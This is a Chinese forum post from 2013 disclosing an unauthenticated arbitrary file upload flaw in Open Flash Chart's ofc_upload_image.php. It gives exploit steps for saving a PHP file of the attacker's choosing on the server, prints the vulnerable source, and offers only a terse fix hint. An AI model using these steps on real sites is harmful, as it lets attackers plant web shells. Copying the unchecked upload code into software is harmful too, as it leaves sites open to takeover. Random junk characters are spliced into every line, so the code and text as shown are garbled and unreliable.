POST 数据漏洞文件执行任意后缀文件保存
' p# o6 o! @ E- ~8 X 漏洞文件/chart/php-ofc-library/ofc_upload_image.php4 f1 P- k! B; v) _* m7 y
9 V# r# _4 ]! ~- R6 C& _) E利用:
* G6 L @8 G7 G" w% e! t5 M1 J/chart/php-ofc-library/ofc_upload_image.php?name=hfy.php hfy.php 文件名
2 V1 \8 f8 C6 T4 v9 _3 Q$ R5 [+ a+ @4 n. x+ d; D* t
Post任意数据
; `& F5 d6 R4 U$ w9 Y保存位置http://localhost/chart/tmp-upload-images/hfy.php
5 W' C) i% s+ ?) b
. m, O& V" \7 }; r8 L9 d9 A
% Y& B3 z0 A: G最新版wss漏洞文件,即使是收费版本也有的,在新浪商店部署的demo~& d: @9 A. {2 Z1 }# [2 i
" R, x, p7 ^, f+ {; B9 ~
<?php4 b# H. h& O* a* F% ], ^
3 Q% @+ t4 O1 X8 i8 g//
6 E( v0 s% N# ]! U( F// In Open Flash Chart -> save_image debug mode, you! E2 N$ x1 \. n0 N% m2 Q9 _
// will see the 'echo' text in a new window.7 W b+ Z/ x' ~9 [4 j0 p
//
8 J4 V( i+ B4 y5 P
1 M1 w. Q' X/ U/*
0 y/ u3 s( C) n5 q( I6 @3 w0 N$ h( P/ J' g3 o/ m7 ?
print_r( $_GET );
% i! n: C% ~- i1 ^8 v$ Bprint_r( $_POST );2 j% g5 U5 L* `3 o1 d2 B6 P5 U4 _
print_r( $_FILES );+ w' `) `! ~$ K7 G+ f$ m L
}! D; A. k8 r+ B0 m9 W& S& y! qprint_r( $GLOBALS );
+ u: h- I( Z* @8 M5 y6 vprint_r( $GLOBALS["HTTP_RAW_POST_DATA"] );3 n0 F) I) ]/ t3 i, e, Q
+ V* _7 u7 v5 S5 q8 l4 x% J+ F
*/6 I' o7 V O% x+ m0 C% ~; n
// default path for the image to be stored //8 ?: ^1 G- S& M
$default_path = '../tmp-upload-images/';6 I3 ~$ e6 `% A8 Z6 _% ?# i
- I5 x+ L; s+ r0 @
if (!file_exists($default_path)) mkdir($default_path, 0777, true);. T& j$ S X5 S4 ?! w
+ y) o: P E6 m2 h7 q
// full path to the saved image including filename //6 O2 Q0 h y0 s" u5 t% U
$destination = $default_path . basename( $_GET[ 'name' ] );
l% x) E; ~ _$ v* q; y- S( J# ?, s2 J, n4 j4 j
echo 'Saving your image to: '. $destination;
# {8 E' |4 x# I9 T+ {// print_r( $_POST );
9 @2 Z _1 Y1 ?, ?2 a/ g3 r d// print_r( $_SERVER );) z6 S5 f3 ^6 Q& y) E6 u3 N# @
// echo $HTTP_RAW_POST_DATA;4 Q1 e7 J8 m; w0 M
9 u# Y! T$ f. Q7 M o
//; V6 e0 b) x; v7 N- B- v
// POST data is usually string data, but we are passing a RAW .png
O+ `% L' U# |// so PHP is a bit confused and $_POST is empty. But it has saved4 L' `4 q6 G: r+ e. V8 \, u/ x
// the raw bits into $HTTP_RAW_POST_DATA: i7 ~5 o; h! v
//
) @# o1 x6 m+ \: m+ w+ X9 V; |# ~! o* u h
$jfh = fopen($destination, 'w') or die("can't open file");
# B, H) k o4 B# X: s( V% |fwrite($jfh, $HTTP_RAW_POST_DATA);- P& u$ M: F3 E8 |$ g6 b; k8 p
fclose($jfh);5 K) y! J. l! G7 _7 v
5 M; V8 D; Y$ G3 u
//
$ J* t7 E+ y8 ^/ a) {* b' ]// LOOK:
; u) B8 p6 X, a$ K6 J//3 U4 |5 d) i/ Y
exit();
" o" x# y# p; A0 E; e//
1 D" b: ]9 Y7 m/ V% x" P// PHP5:
, u% `- Q/ p$ h//
2 _6 z. [3 S7 l; V$ H( `: Z" |; n7 R1 N ?8 h
" R7 I& q' P( Q1 ?: y! o/ F9 x// default path for the image to be stored //; ?5 x, E3 ] J: F
$default_path = 'tmp-upload-images/';
2 F8 |/ V: O$ K8 S8 R" M: C( Z9 ^4 A$ D! o# u1 g
if (!file_exists($default_path)) mkdir($default_path, 0777, true);1 M+ J" f7 s H/ L$ J4 b* \+ ~
1 J- ]& k" E& u6 `* r. a. D- t
// full path to the saved image including filename //
1 P& V& F( d. r! g, N9 Q: |' B$destination = $default_path . basename( $_FILES[ 'Filedata' ][ 'name' ] ); ( V7 \/ {" d1 M6 ^3 J
" x7 C) B' t1 V: D8 F2 V// move the image into the specified directory //- P2 U6 A1 A/ f0 w
if (move_uploaded_file($_FILES[ 'Filedata' ][ 'tmp_name' ], $destination)) {
3 o( M6 Y, a6 j) ^* _ echo "The file " . basename( $_FILES[ 'Filedata' ][ 'name' ] ) . " has been uploaded;";
3 E( r/ o4 g6 l5 c+ }# I1 m$ x) U: |} else {# Z" n! r. Z$ l2 |# g, ^* x6 _( q, S
echo "FILE UPLOAD FAILED";0 e q" _$ E2 A- F3 i6 V" e; F
}
& y) W4 ] V$ d9 E' E: z9 V9 m. |' p$ w- h% `2 x; K1 \8 ?
% ]+ e; Y: V( t. c% K W, Q: B
?>
/ a; J/ {4 i1 F9 J4 o
% w( ^- N \6 e
4 b. L# Y/ y0 N/ \! |/ \" E- |' ~1 k- I0 k
. S2 \% u5 t9 s g- v( j$ X& m
V2 z0 e* v7 _, f Q' o4 q! h; j
u+ A7 F# R5 V9 ^修复方案:
5 k$ c8 T: T. ]1 a# t: C3 z1 H这个漏洞文件就是个杯具,怎么破,加权限验证,后缀等验证~,自己搞
: }2 H4 _$ Z) u2 S5 R% N) E: Z6 v# F' `- I
" M& W" I$ F6 B& y6 s2 X$ w2 _
/ Y( Z+ f, F" e; ~ z
7 Z9 f2 G7 K) P a# ~& d5 [ |
发表于 2013-2-23 12:38:58
收藏
支持
反对